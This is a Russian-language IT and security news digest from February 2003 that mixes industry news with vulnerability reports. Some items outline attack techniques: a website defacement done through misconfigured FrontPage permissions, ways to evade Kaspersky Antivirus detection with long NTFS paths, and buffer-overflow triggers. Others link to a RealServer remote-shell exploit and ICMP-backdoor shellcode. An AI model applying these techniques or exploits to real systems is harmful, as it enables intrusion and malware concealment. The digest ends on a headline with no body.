Как пишут на сайте linux.org.ru, по результатам исследования проведенного Reasoning Inc. оказалось что реализация стека протоколов TCP/IP в Linux версии 2.4.19 имеет меньше дефектов чем реализации этого стека в нескольких коммерческих системах. Подробности - http://www.linuxdevices.com/news/NS9753699775.html
14/02/2003 10:27 ReactOS - клон Windows NT с открытым исходным кодом.
В начале февраля увидела свет первая предварительная версия новой операционной системы ReactOS. Она представляет собой клон Windows NT, поставляемый с открытым исходным кодом. Разработчики намереваются обеспечить полную поддержку драйверов и программ для Windows NT путем внедрения в ядро ОС всех необходимых программных интерфейсов API. Впрочем, хотя работы над открытым клоном Windows NT начались еще в феврале 1998 г., они до сих пор находятся на самой начальной стадии - текущая версия ReactOS имеет индекс 0.1.0. К настоящему времени в ядре реализованы такие службы как NtProtectVirtualMemory, возможность кэширования директорий и сегментов FAT, по сравнению с самыми первыми версиями улучшена система управления памятью. Наборы функции многих системных библиотек в настоящее время приведены в соответствие с библиотеками обычной Windows NT. Большинство появившихся в ReactOS 0.1.0 драйверов предназначены для работы с дисковыми накопителями. В частности, реализована корректная поддержка ATAPI, обеспечена правильная работа с большими разделами с файловой системой FAT32. Поддержка драйверов сторонней разработки пока ограничена. Сайт проекта - http://reactos.com/
14/02/2003 10:05 Kaspersky™ Anti-Spam в продаже в Интернет-магазине.
"Лаборатория Касперского", ведущий российский разработчик систем информационной безопасности, сообщает о начале продаж Kaspersky™ Anti-Spam в Интернет-магазине компании. Теперь популярный программный комплекс для защиты от нежелательных писем (спама) можно приобрести не только в офисе и через сеть партнеров "Лаборатории Касперского", но и на сайте компании www.kaspersky.ru. Kaspersky Anti-Spam - это высокоэффективная система для борьбы с нежелательной корреспонденцией для средних и малых предприятий. Продукт сочетает революционные технологии лингвистического анализа текстов, все современные методы фильтрации электронной почты и уникальный набор сервисов, которые позволяют пользователям распознать и уничтожить до 95% нежелательного трафика Подробности - http://www.kaspersky.ru/news.html?id=1200607
14/02/2003 09:53 Пентагон пытается возобновить финансирование "Эшелона".
В ответ на принятую месяц назад сенатскую поправку, исключающую из бюджета всякое финансирование программы TIA (Total Information Awareness Program), Пентагон предлагает создать две рабочих группы, которые будут контролировать соответствие программы американским privacy-стандартам. Программа TIA является проектом правительственной службы Information Awareness Office. Та, в свою очередь, входит в состав небезызвестного агентства DARPA (Defense Advanced Research Projects Agency), автора скромной и повсеместно протянутой паутины. Целью программы является перехват "информационных сигнатур" отдельных людей для дальнейшего отслеживания сетевой активности потенциальных террористов и прочих преступников. Что, как вы понимаете, идет в полный разрез со столь известным на Западе термином "privacy". Согласно заявлению Пентагона, две рабочих группы (внутренняя, состоящая из старших работников министерства обороны, предназначена для выработки процедур использования наработанных в рамках программы технических средств; и внешняя, следящая за соблюдением программой законодательства США) способны обеспечить развитие TIA в соответствии с основными принципами американской демократии. Подробнее - http://www.viruslist.com/index.html?tnews=1007&id=1795186
14/02/2003 09:20 Кевин Митник изгнан из ISSA.
Отныне всемирно известный хакер Кевин Митник ограничен в правах - ему запретили посещать съезды ISSA (Американской Ассоциации по безопасности информационных систем). Недавно Митник получил от Ассоциации письмо следующего содержания: "Ваше прошлое поведение не соответствует Уставу ISSA, следовательно, мы не можем принять вас в члены нашей организации". ISSA была создана в 1982 году и сегодня является самой большой некоммерческой организацией по компьютерной безопасности в США. Решение членов ISSA кажется довольно внезапным в связи с тем, что ранее Ассоциация и Митник слыли большими друзьями. Незадолго до того, как после долгого перерыва Митнику вновь было позволено пользоваться интернетом, в декабре 2002 года Митник инкогнито посетил съезд ISSA Американской Ассоциации по безопасности информационных систем. Тогда его почти никто не узнал. 23 января 2003 года Митник получил поздравительную открытку от ISSA в связи с возвращением в Интернет. Примерно тогда же знаменитого хакера приняли в члены ISSA. Однако, вскоре после этого на очередном съезде Ассоциации присутствие Кевина Митника вызвало массу разногласий среди его постоянных членов и послужило причиной своего рода раскола среди членов ISSA. Члены ISSA разделились на два лагеря: одни относились вполне лояльно к фигуре бывшего хакера, другие же считали его присутствие в ISSA оскорбительным. В конце концов, мнение последних перевесило. Прошлое Митника на этот раз сыграло против него - он был изгнан из Ассоциации. Источник - http://www.runet.ru
14/02/2003 09:08 Microsoft Office 11 не будет.
Следующая версия Microsoft Office, ранее известная под названием Office 11, вероятно, будет переименована в Office 2003, в связи с выходом релиза второй бета-версии в начале следующего месяца. Название нового пакета приложений будет соответствовать общей тенденции наименования продуктов Microsoft. Напомним, что ранее Microsoft изменил название Windows .NET, запланированной к выходу в апреле, на Windows Server 2003. Microsoft выпустила первую бета-версию Office 11 в октябре прошлого года. Вторая бета-версия выйдет для внутреннего пользования уже на следующей неделе. Выход тестового релиза запланирован на 6 марта. Персонал по маркетингу всех представительств Microsoft на следующей неделе соберется в офисе компании в США для прохождения тренинга по новому продукту. Окончательная версия продукта появится на рынке в середине года. Источник - http://www.cnews.ru
13/02/2003 10:33 IANA утвердила многоязычные домены.
IANA(Internet Assigned Numbers Authority) поставила последнюю точку в стандарте IDNA, выбрав префикс для многоязычных доменов. Теперь, согласно стандарту IDNA все преобразованные в латиницу многоязычные домены должны начинаться с "XN--", после чего следует имя домена. Например русскоязычный домен ПРЕЗИДЕНТ.ОРГ будет записан на сервере ДНС, как XN--aq7uanjxha2dkpkc.XN--aq7eamy. Новшество коснется только администраторов ДНС и владельцев доменов, так как коды IDN скрыты для пользователей - они имеют дело только с самим доменом на родном языке. После вступления стандарта в силу (об этом будет скоро объявлено) владельцы многоязычных доменов должны будут обновить записи на ДНС и WWW серверах, в соответствии с присланными им новыми кодами. Для пользователей Интернет, которые уже настроили свои браузеры на IDN, это произойдет незаметно - программа iResolve обновляется автоматически Источник - http://www.internet.ru
13/02/2003 09:38 Инсталляция ОС Linux на компьютер с Windows.
Как написано на сайте linux.org.ru, c разрешения издательства "BHV-Петербург" на сайте http://linux-ve.net опубликована глава 2 "Инсталляция ОС Linux на компьютер с Windows" из книги В.Костромина "Linux для пользователя", которая была выпущена этим издательством в 2002 году. Там же вы найдете подробное оглавление книги, так что сможете судить о том, как написана книга и стоит ли ее покупать. Вы можете просмотреть текст главы 2 в html-формате, либо скачать файл в формате Word или архив, содержащий то и другое. Подробности - http://linux-ve.net/book/gl-02/gl_02.html
13/02/2003 09:24 На Windows XP подали жалобу в Евросоюз.
Ассоциация производителей компьютеров и коммуникационного оборудования (CCIA), базирующаяся в Вашингтоне, подала жалобу в антимонопольную комиссию Евросоюза на корпорацию Microsoft, сообщает BBC News. CCIA, в которую входят такие компании, как Oracle, Sun Microsystems, Yahoo и Nokia, считает, что Miscrosoft использует нечестные методы конкурентной борьбы при внедрении на рынок своей последней операционной системы Windows XP. Соответствующая жалоба на 260 страницах была представлена главе еврокомиссии Марио Монти (Mario Monti). Подробности - http://news.bbc.co.uk/2/hi/business/2750529.stm
13/02/2003 09:12 Виртуальный ответ «американскому Керзону»?
Россия располагает достаточным научным и производственным потенциалом для адекватных ответов на кибератаки. Об этом заявил сегодня директор Московской информационной корпорации, доктор физико-математических наук Сергей Соловьев, комментируя подписание президентом США секретной директивы о разработке основ национальной стратегии кибервойны. В ее ходе, считает ученый, могут применяться атаки на сайты, рассылка компьютерных вирусов или разрушающих программ ("троянских коней"). Наконец, могут предприниматься попытки вывода из строя компьютеров с помощью постановки радиопомех или мощных электромагнитных импульсов. "Российская школа программирования является лучшей в мире, поэтому не удивительно, что именно в нашей стране появились самые совершенные приемы борьбы с вирусами, - отметил Соловьев. - Разработанными программами пользуются во всем мире. Научная элита Россия не осталась в стороне и от разработки других защитных систем". Однако более продуктивным, по мнению ученого, был бы отказ от кибервойн, как в свое время ушли в историю "звездные войны". Источник - http://www.oxpaha.ru
13/02/2003 09:02 Microsoft представила Whidbey.
Microsoft отмечает первую годовщину выхода среды разработки приложений Visual Studio .NET и .NET Framework, приоткрыв завесу над следующей основной версией этого продукта на проходящем в Сан-Франциско шоу VSLive! 2003. Один из вице-президентов компании Эрик Раддер (Eric Rudder) представил новые свойства готовящейся к выходу Visual Studio .NET 2003, которая будет анонсирована в следующем месяце и выпущена в 2004 году, а также коснулся некоторых новшеств, вошедших в следующую версию продукта, известную под названием Whidbey. Visual Studio .NET 2003 будет более связной и безопасной, позволит увеличить продуктивность разработчиков и будет иметь более зрелую окружающую среду, чем ее предшественник. Новый инструментарий имеет большую связь с базами данных для систем Oracle и расширенные возможности безопасности. Visual Studio .NET 2003 также имеет инструменты для переноса кода Visual Basic 6 и управления новой средой. Г-н Раддер представил новых членов Visual Studio .NET Integration Program (VSIP), включая Borland Software, AmberPoint и NetManage. Теперь в эту программу входит более чем 160 участников с более чем 300 инструментариями, которые можно интегрировать в среду Visual Studio .NET. Кроме того, были представлены публичные бета-версии двух технологий, ASP.NET Starter Kits и набора инструментария, известного как Visual Studio Tools for Office. Пять инструментов из первой технологии охватывают электронную коммерцию, порталы, отчетные данные и другое, а также включают в себя простые приложения для пользователей, только начинающих изучать построение решений в ASP.NET. Visual Tools for Office позволит разработчикам использовать Visual Basic .NET и Visual C# .NET для автоматизации и улучшения Microsoft Word и Excel. Источник - http://www.cnews.ru
12/02/2003 18:32 ЭшеСорм?
По материалам bugtraq.ru. Network Associates опубликовала пресс-релиз с информацией о своем новом изделии - InfiniStream. Назначение у него очень благое: записывать весь трафик, чтобы в случае атаки иметь возможность "прокрутить" события и восстановить картину происшествия. Т.е. своеобразный "черный ящик". Устройство представляет собой специализированный компьютер под управлением Linux, который в состоянии записать 2.9 ТБ, что эквивалентно приблизительно 2.5 дням работы гигабитной полнодуплексной сети с 5% загрузкой. Все бы ничего, да только где гарантия, что эти данные будут использоваться исключительно для борьбы с киберпреступлениями, а не для вмешательства в частную жизнь и сбора персональных данных? Подробности - http://www.nai.com/naicommon....
12/02/2003 12:29 Об электронных ключах и электромеханических замках .
Как ообщает сайт bezpeka.com, На сайте Daily.sec.ru опубликована интересная статья под названием "О электронных ключах и электромеханических замках". Электронные замки - новая и не совсем понятная для потребителя вещь, и посему он слепо верит продавцам, что электронное чудо надежно защитит его имущество. Автор статьи под именем Александр описывает слабые стороны и недостатки различных типов электронных приводов, блоков управления и идентификации, включая устройства на смарт картах, магнитных ключах, кодовые панели, дактилоскопические считыватели и др. Статья не является руководством по взлому электронных замков, но служит неплохим пособием для потенциального покупателя, дающим основные понятия о современных типах замков и помогающим избежать распространенных ошибок при их выборе. Статья - http://daily.sec.ru/dailypblshow.cfm?rid=45&pid=6633
12/02/2003 11:31 Подробности дефейса Вэб-сайта Кевина Митника.
Как сообщают ребята из Zone-H (которые, собственно, первые и объявили о дефейсе сайта Митника), дефейс сайта стал возможен из-за некомпетентности администратора сервера. На сервере под управлением IIS с Frontpage-расширениями были неверно выставлены полномочия на директори Вэб-сервера. Подобная уязвимость была описана аж в июне 2000 г. в бюллетене CIAC (неверные полномочия на директорию \webroot\_vti_bin - при этом любой сторонний посетитель получает права на доступ к файлам admin.dll и author.dll). Дефейс можно было выполнить очень просто - для этого достаточно было создать на своём Windows-дэсктопе Вэб-папку с названием www.defensivethinking.com. При обращении к этой папке открывается полная стуктура уязвимосго Вэб-сайта (в данном случае, www.defensivethinking.com) с правами чтения, записи и просмотра всех файлов внутри директории. После этого достаточно создать файл index.htm и просто поместить его в Вэб-фолдер - и все - Вы в Хопре ©Старая реклама :) Сам Кевин в интервью The Register сказал: "Дефейснутый сайт находился в публичном сегменте сети, отделённом от внутреннего сегмента сети фирмы. Никакая служебная информация не была похищена и внутренней стуктуре сети фирмы не был нанесён ущерб". Напомним, что Вэб-сервер фирмы Кевина был 2 раза задефейсен в конце января хакером BugBear (по некоторым сведениям, подобным образом он пытался устроиться на работу в фирму). Также приводим ссылку на уязвимость при помощи которой был осуществлён дефейс сайта. Подробности - http://www.zone-h.org/defaced/2003/01/30/www.defensivethinking.com/hacked.html Бюллетень CIAC - http://www.ciac.org/ciac/bulletins/k-048.shtml
12/02/2003 10:39 Microsoft не будет переносить Internet Explorer 6 на платформу MacOS.
Как известно, компания Apple готовит к выпуску собственный веб-браузер Safari. Его появление уже внесло коррективы в политику ряда компаний в отношении платформы MacOS. Например, компания Opera поставила под сомнение выпуск седьмой версии своего "самого быстрого на Земле браузера" для "Макинтошей". Были некторые сомнения в целесообразности продолжения работ и у создателей браузера Chimera, основанного на коде Mozilla, но использующего инетфейс MacOS X. Возможно, что от планов по выпуску новой версии своего браузера для MacOS X откажется и корпорация Microsoft. По информации сайта Think Secret, посвященного разнообразным слухам, связанным с Apple, сейчас основные усилия соответствующего подразделения Microsoft нацелены на выпуск MSN 8 - новой версии клиента для доступа в интернет через провайдера Microsoft Network (MSN). Версия этой программы для компьютеров Macintosh должна увидеть свет уже в ближайшее время. Напряженная работа над MSN 8 вынудила программистов Microsoft временно заморозить работы над переносом на MacOS X браузера Internet Explorer 6. По сообщению Think Secret, основа нового браузера практически готова - производительность его предварительной версии вполне приемлема, а при создании интерфейса в Microsoft максимально полно использовали широкие возможности десятой версии MacOS. Однако выпуск Safari может заставить Microsoft отказаться от завершения работ над IE6 для MacOS. Официально, впрочем, об этом пока не объявлено. Источник - http://www.thinksecret.com/
12/02/2003 10:01 Выход Mozilla 1.3b.
Вышла бета версия Mozilla. Из нового: установка размеров изображений, позволяющая переключаться между полной размерным изображениями и выравненными по размеру окна. Опция может быть отключена в настройках. Также динамическое изменение профиля из меню Инструменты и в about:config можно будет редактировать настройки программы не открывая файл prefs.js в текстовом редакторе. Взято с linux.org.ru. Скачать - http://www.mozilla.org/releases/
12/02/2003 09:18 Не ломайте, дети, Bloomberg.com.
На прошлой неделе в США начался процесс по факту взлома сайта финансовых новостей Bloomberg.com безвестным Олегом Зезевым, некогда проживавшем в Казахстане. Согласно обвинению, Олег в марте 2000 года воспользовался погрешностью в защите базы данных сайта для последующего шантажа владельца, Майкла Блумберга (Michael Bloomberg). Схема стандартная: вы мне деньги, я вам - описание прорехи в вашем софте. Но то ли Майклу стало жалко денег, то ли у него и вовсе не было в наличии запрошенных скромным Олегом 200 тысяч долларов, но связался Майкл в первую очередь с ФБР. Где ему и посоветовали согласиться на личную встречу с затерявшимся в степях Казахстана хакером. Тот оказался удивительно доверчивым человеком и явился на встречу в Лондон в августе того же года, и не один, а со своим помощником. Где их и "взяли" местные полицейские для последующей экстрадиции в США. Подельнику Олега, некому Яримке (Yarimka), уже было предъявлено обвинение, суд же начнется чуть позже в этом году. Источник - http://www.viruslist.ru
11/02/2003 17:49 Переполнение буфера в cmd.exe.
И третья уязвимость, обнаруженаая всё тем же ZARAZA. Природа уязвимости та же - неверная обработка длинных путей. На этот раз была обнаружена возможность переполнения в буфере в командном процессоре cmd.exe, присутствующим во всех ОС с ядром WinNT. При обработке команды CD с длиной пути больше 256 байт в WinNT Происходит переполнение буфера с дальнейшим возможным выполнением произвольного кода, в Win2K подобная "особенность" проявляется несколько по другому. После выполнения команды CD с длиннным именем пути cmd.exe оказывается заперт внутри директории, в которую осуществлён переход (то есть выполнение элементарной команды типа CD .. делается невозможным). Подобная особенность может быть использована против выполнения настроечных пакетных файлов. Примеры BAT-файлов для проверки уязвимостей (как этой, так и предыдущих) приводятся внутри подробных описаний. Подробности - http://www.security.nnov.ru/search/document.asp?docid=4063
11/02/2003 17:40 Переполнение в FAR.
Вторая уязвимость была обнаружена всё тем же ZARAZA в популярном файловом менеджере FAR, разработанном и поддерживаемом Евгением Рошалем и RARSoft. Природа уязвимссти кроется всё в той же особенности NTFS создавать длинные имена путей и невозможности WinAPI их обработать. Таким образом при доступе к файлу с длиной пути больше 260 байт возникнет переполнение указателя стека (off-by-one frame pointer overflow в оригинале) с "падением" FAR и возможностью локального выполнения кода. Уязвимость была обнаружена в FAR 1.70beta4 и устранена в выпущенной версии 1.70beta5. Подробности - http://www.security.nnov.ru/search/document.asp?docid=4062
11/02/2003 17:24 Уязвимости в KAV.
Наш уважаемый соотечественник ZARAZA из Нижнего Новгорода сообщает об обнаружении уязвимостей в популярном антивирусе KAV (он же Kaspersky Antivirus). 2 уязвимости связаны с ошибками при обработке слишком длинного имени пути файла. NTFS позволяет создать путь неограниченной длины, однако Windows API не поддерживает длину пути более 256 байт. Для предотвращения проверки длинного имени пути API, можно использовать префикс \\?\ в имени файла (это документированная особенность Win API). Было обнаружено, что KAV при обработке длины пути, тем не менее, либо рушится, либо зависает с поглощением всех ресурсов процессора. Также можно удалённо завесить сервер с установленным серверным KAV, однако для этого необходим доступ с возможностью записи в директорию). Вторая уязвимость связана с тем, что при создании файла с подобным длинным путём может предотвратить его обнаружение KAV (а файл может оказаться вирусом или трояном, например). Третья уязвимость связана с тем, что при создании NTFS-файла c именем специального зарезервированного устройства (например, aux.vbs или aux.com) также превидёт к тому, что его невозможно будет идентифицировать при помощи KAV. Проверялось на версии KAV 4.0.9.0 в ОС Windows NT 4.0 и Windows 2000. Подробности - http://www.security.nnov.ru/search/document.asp?docid=4061
11/02/2003 14:43 Эксплоит для RealServer.
Jonny Cyberpunk из немецкой группы THC ("The Hacker's Choice") выпустил эксплоит, позволяющий получить удалённый шелл на сервере с запущенным RealServer под управлением ОС Win2K (SP1, SP2), WinXP (SP1), WinNT4 (SP6a). Как пишет сам автор в предисловии, эксплоит тестировался на серверах с запущенным RealServer версии менее 8.0.2. Сам сервис запущен на порту 554/TCP, и, как утверждает сам автор, согласно результатам его сканирования около 99% серверов не пропатчены после обнаружения уязвимости. Размер шеллкода не превышает размер 300 байт. После выполнения удалённого эксплоита на сервере-жертве порождается шелл на порту 31337/TCP и для дальнейшего использования рекомендуется использовать netcat. Собственно, достаточно полная информация содержится во вводном комментарии к исходнику. Эксплоит сделан для платформы win32. ZIP-файл содержит сам исходник и откомпилированный при помощи MS Visual C++ exe-файл. Эксплоит - http://www.thehackerschoice.com/misc/sploits/THCunREAL.zip
11/02/2003 14:05 Вторая версия документа "Securing & Optimizing Linux: The Ultimate Solution".
Тот же сервер openna опубликовал версию 2.0 довольно полезного документа под названием "Securing & Optimizing Linux: The Ultimate Solution v2.0". Как следует из названия, посвящён он оптимизации и настройке безопасности сервера и рабочей станции под управлением ОС Linux. Одним из главных достоинств документа является то, что он представляет собой пошаговую инструкцию по обеспечению максимальной производительности и безопасности сервера. Может представлять интерес как для начинающих пользователей, так и для экспертов. Выпущен в PDF-формате. Ссылка - http://www.openna.com/products/books/sol/solus.php
11/02/2003 13:54 Cтатья об установке PHP.
На сервере openna опубликована статья под нзванием "How to Build, Install, Secure & Optimize PHP". Как сказано во вступительном слове, в последнее время, при необходимости добавления разнообразных Вэб-сервисов WWW-серверу администраторы зачастую обращают внимание на PHP. Тенденции свидетельствуют об увеличении доли сервиса с использованием PHP и снижении других языков для обеспечения вэб-сервисов, в частности Perl и CGI. Статья, выпущенная openna как раз и рассказывает о том, как установить, оптимизировать PHP в качестве модуля Вэб-сервере Apache 2.x. Также внимание уделено настройке безопасности при работе с PHP. Статья - http://www.openna.com/documentations/articles/php/index.php
11/02/2003 12:23 Уязвимость в NOD32.
NOD32 Antivirus System является кроссплатформенным антивирусным приложением, выпускаемым и поддерживаемым Eset Software. Компилируется из исходников под платформы Linux, FreeBSD, OpenBSD и NetBSD. Как сообщает компания iDEFENSE, её членами была обнаружена уязвимость в этом приложении, позволяющая локальному пользователю получить привилегии суперпользователя. Переполнение буфера может возникнуть при разборе NOD32 абсолютного пути с длиной запроса более 500 символов (/tmp/AAAA... например). При этом происходит перезапись первых трёх байтов регистров eax и ecx. Для платформы FreeBSD 4.7 был написан эксплоит. Уязвимость была обнаружена в версии 1.012, производителем выпущена версия 1.013, в которой уязвимости нет. Подробности - http://www.idefense.com/advisory/02.10.03.txt
11/02/2003 10:42 Очередная порция уязвимостей в Opera (часть 2)
Второе сообщение об уязвимости появилось от Marc Schoenefeld из Beauchamp Security (Германия). Как утверждает автор, сконструировав специально офрмленный Java-апплет, можно вызвать DoS в Опере с последующим "падением" броузера. Связана уязвимость с собственным классом Оперы в файле библиотеки opera.jar. Приведённый автором код Java-апплета вызывает URL с очень длинной строкой в методе showDocument объекта PluginContext, что, в свою очередь приводит к аварийному завершению виртуальной машины Java (JVM) и падению Оперы. Тестирование проводилось на версиях Opera 6.05/7.01 в ОС WinXP прямым вызовом апплета после инсталляции. Opera Software не ответила на письмо автора. В качестве временной меры устранения уязвимости рекомендуется отключить поддержку Java (File -> Preferences -> Multimedia). Подробности - http://www.illegalaccess.org/java/OperaCall2.html
11/02/2003 10:22 Очередная порция уязвимостей в Opera (часть 1).
Не успел утихнуть шум, поднятый после опубликования GreyMagic Softwar целого букета уязвимостей в броузере Opera и повлекший за собой выход новой версии Opera 7.01, как тут же появились 2 новых сообщения об уязвимости в этом популярном броузере. Первое сообщение (не столь критичное) появилось от некоего nesumin <nesumin@softhome.net> из Японии. Автору утверждает, что при очень большом имени пользователя в URL, к которому осуществляется доступ, приводит к переполнению буфера на стеке. При этом возможна перезапись адреса возврата (RET) на стеке, что, потенциально, может привести к выполнению произвольного кода в системе. Последствия уязвимости достаточно очевидны - от повреждения системы до возможности внедрения вирусов и троянов. Происходит подобное "безобразие" из-за того, что при наличии имени пользователя в URL или HTTP идёт обращение к ресурсу под номером "21463", определённом в файле языка (*.lng), который пытается показать "URL Warning Dialog". При очень длинном значении имени пользователя (длина поля URL ограничена) происходит переполнение бучера на стеке. Перезапись адреса возврата RET происходит при длине имени пользователя 2624 символов (16 бит), что зависит от строки ресурса "21463". Для временного устранения уязвимости рекомендуется удалить два символа "%s" в строке ресурса под номером "21463" в файле языка (*.lng). При анализе данной уязвимости необходимо сделать одно существенное замечание - уязвимость была обнаружена в версиях Opera6.05 build 1140 и Opera7 beta2 build 2577. Версии 7.0 и 7.1 уязвимостью не обладают. Источник - http://www.securityfocus.com
11/02/2003 09:20 Статья "Кибертеррористы 2002: кто они?"
Проблема «кибертерроризма» стала больным вопросом, как для большинства компаний, так и для экспертов по защите IТ. Компания Symantec, всемирный лидер по защите сети Internet от кибератак (Symantec’s global Internet Security Threat Report), обнародовала статистические данные о количестве и характере кибератак за второе полугодие 2002 года. Лидером по количеству кибератак являются США, на счету которых 35,4% от мирового коэффициента киберпреступлений за второе полугодие 2002 года. Эта цифра снизилась по сравнению с 40% за первое полугодие 2002 года, но, тем не менее, она постоянно растёт. Второе место в списке кибернарушителей занимает Южная Корея - 12,8%; за ней Китай - 6,9%; Германия - 6,7%; Франция - 4%. Великобритания занимает 10 место, совершая 2,2% от всего коэффициента кибератак. Самыми распространенными среди них являются: программные вирусы, саморазмножающиеся компьютерные вирусы и другие формы сбоев программного кода. Тот факт, что США лидируют в этом списке, вполне закономерен, так как здесь, по сравнению с другими странами, наблюдается наибольшее число онлайновых пользователей. Что касается количества кибератак на 1000 Internet-пользователей, то во втором полугодии 2002 года, Южная Корея (23,7% от общего числа) оставила далеко позади все другие страны. Второй в списке среди стран с более чем один миллион пользователей, следует Польша (18,4%), Чехия (14,2%), потом Франция (14,2%) и на пятом месте Тайвань (14%). Подробности - http://www.crime-research.org
11/02/2003 08:55 Новый вариант сервис-пака для Windows XP.
Корпорация Microsoft выпустила в начале февраля новый вариант пакета обновлений для операционной системы Windows XP. Так называемый SP1a отличается от выпушенного в прошлом году SP1 отсутствием виртуальной машины Java разработки Microsoft. На такой шаг компания пошла, чтобы соблюсти решение судьи Фредерика Мотца, который постановил, что Microsoft должна включить в состав Windows вариант Java, разработанный компанией Sun Microsystems. Причем сделать это необходимо в течение 120 дней. В своем иске Sun обвинила Microsoft в дискриминации Java (виртуальная машина не была включена в состав оригинальной версии Windows XP) и в поставке устаревшего варианта Java в SP1 (Microsoft не имеет права развивать свою виртуальную машину по условиям соглашения с Sun). И хотя Microsoft подала апелляцию и добилась приостановки действия решения судьи Мотца, работы по включению в Windows Java в версии от Sun всё же ведутся. Java от Sun появится в следующем варианте пакета обновлений с индексом SP1b. Будет ли он выпущен в свет, зависит от решения апелляционного суда. В настоящее время пользователи Windows XP могут скачать с сайта Microsoft только пакет обновлений SP1a. Софтверный гигант, однако, подчеркивает, что пользователям, уже установившим SP1, нет необходимости загружать новый сервис-пак. То же будет относиться и к SP1b. Ожидается, что Microsoft включит Sun Java в пакет обновлений Service Pack 2 для Windows XP, тестирование и выпуск которого намечены на нынешний год. Разумеется, это произойдет только в случае, если решение судьи Мотца не будет отменено. Источник - http://www.compulenta.ru
10/02/2003 20:29 AIX 5.2 сертифицирована в Германии.
Корпорация IBM объявила о присвоении ее операционной системе AIX 5L версии 5.2 сертификата безопасности Федерального управления информационной безопасности Германии. Сертификация свидетельствует о том, что AIX 5.2 отвечает требованиям к безопасности в соответствии с профилем контролируемой защиты доступа (Controlled Access Protection Profile, CAPP). Он представляет собой эквивалент профиля безопасности TCSEC CS, действующего в США, и признается соглашением Common Criteria. Данная операционная система класса Unix, работающая на серверах IBM eServer pSeries, была подвергнута всеобъемлющему испытанию на соответствие уровню безопасности EAL (Evaluation Assurance Level) 4+. AIX 5.2 стала первой операционной системой, получившей данный сертификат одновременно с выходом на рынок. Испытания на соответствие требованиям CAPP проводились в конфигурации, включавшей 64-разрядное ядро на процессорах Power3 и Power4, а также менеджер логических томов AIX Logical Volume Manager и журнальную файловую систему JFS2 Enhanced Journaled File System. Источник - http://www.osp.ru
10/02/2003 19:09 ICMP-шеллкод для ОС Linux.
Член бельгийско-голландской группы Netric Security Team, носящий ник gloomy опубликовал довольно интересный шеллкод для операционной системы Linux. Несмотря на довольно малую длину (137 байт), он является ICMP-бэкдором, которым можно управлять посредством утилиты ping. Исходник - http://www.netric.org/shellcode/linux-x86/icmp.c
10/02/2003 18:53 Страховщики повышают ставки в ожидании сетевых атак.
Компьютерные вирусы и сетевые черви приносят убытки, не только увеличивая затраты компаний на безопасность и восстановление потерянных данных. Теперь к статьям расходов добавились и повышенные ставки страхования. Многие страховые компании, находясь под впечатлением от масштабов электронных эпидемий последних двух лет, решили обособить потери от вирусов от рисков общего характера. Новый параграф в договорах страхования описывает так называемые "сетевые риски", взносы по которым составят от 5 до 30 тысяч долларов США в год, что выльется, в общей сложности, примерно в миллион долларов всей суммы рисков. Сегодня регистрируется до 600 успешных сетевых атак в день, тогда как ранее эта цифра была вдвое меньше. В 2003 году аналитическая компания TruSecure прогнозирует рост ущерба от преступлений в компьютерной сфере на 25%, то есть порядка 2,8 млрд. долл. в финансовом выражении. А суммы страховок от электронных преступлений подскочат от нынешних ста миллионов до 900 млн. долл. к 2005 году, говорится в исследовании Gartner. Источник - http://www.usatoday.com
10/02/2003 18:46 Обновления в w3m от Red Hat.
В Red Hat Linux версий Red Hat Linux 7.0J - i386 Red Hat Linux 7.2 - i386, ia64 Red Hat Linux 7.3 - i386 Red Hat Linux 8.0 - i386 пакет w3m содержит cross-site scripting уязвимость, позволяющую злоумышленнику исполнять на удаленной машине код, "благодаря" неправильной обработке тега img указанного текстового браузера. Подробности - http://lwn.net/Articles/22182/
10/02/2003 14:27 Обновления в kernel-utils для Linux Red Hat 8.0
Утилита uml_net, входящая в пакет kernel-utils в популярном linux дистрибутиве red hat 8.0, из-за установленного для нее setuid root, позволяет любому непривелегированному пользователю контролировать работу сетевых интерфейсов, редактировать arp таблицы или же переводить интерфейс в режим promiscuous (сбора всех пакетов сети). Обновления уже доступны с ftp сайта компании производителя. ftp://updates.redhat.com/8.0/en/os/i386/kernel-utils-2.4-8.28.i386.rpm Источник - http://lwn.net/Articles/22201/
10/02/2003 11:36 Двое британцев арестованы за создание компьютерного вируса
Британская полиция арестовала двоих подозреваемых в создании компьютерного вируса TK. Этот вирус, подобно червям Code Red или Slammer, атакует серверы и не очень известен широкой публике, однако ущерб от его действий оценивается в 9 миллионов долларов США. Со времени появления червь успел заразить около 18000 компьютеров по всему миру. После ареста в домах арестованных были проведены обыски, а компьютеры подозреваемых конфискованы для проведения расследования. Впрочем, официальных обвинений арестованным пока не предъявили. Источник - http://compulenta.ru/2003/2/10/37451/
10/02/2003 11:29 Вышел Linux 2.4.21pre4-ac3
Очерендое обновление в препатче стабильной ветви ядра от Алана Кокса. На этот раз - bugfix релиз. Исправления в коде Alpha,ATAPI устройств,драйверах cs46xx,3c460. Полный ChangeLog - http://linuxtoday.com/news_story.php3?ltsn=2003-02-08-006-26-NW-KN-DV
9/02/2003 13:51 За компьютерные преступления в Украине будут жестко наказывать.
Кабинет Министров Украины (КМУ) подготовил поправки к Криминальному и Криминально-процессуальному кодексам Украины, которые предусматривают уголовную ответственность за создание с целью сбыта, сбыт технических устройств и компьютерных программ, предназначенных для незаконного вмешательства в работу компьютеров, их сетей или способных блокировать их работу, - сообщает пресс-служба КМУ. В законопроекте также предполагается конфискация технических устройств и программ, использовавшихся при совершении преступления. Поправки подготовлены в соответствии с положениями Конвенции о киберпреступности и отвечают намерениям Украины привести отечественное законодательство в согласие с международным. Источник - http://www.crime-research.org/
9/02/2003 13:20 Cтатья о бэкдорах, троянцах и руткитах в Windows.
На сайте securitysearch.net опубликована интереснейшая статья Bartosz Bobkiewicz с названием "Hidden Backdoors, Trojan Horses and Rootkit Tools in a Windows Environment". Как следует из названия, она посвящена основным бэкдорам, троянцам и руткитам, которые существуют для win-ОС. Самым ценным является то, что автор также описал методы обнаружения этой заразы, а также программ и утилит, помогающих выполнить их обнаружение и устранение. Также большую ценность представляют приведённые автором в конце статьи ссылки на программы и статьи. Статья - http://www.securitysearch.net/articles/Hidden_Backdoors...
9/02/2003 12:24 Уязвимость в игровом движке Unreal.
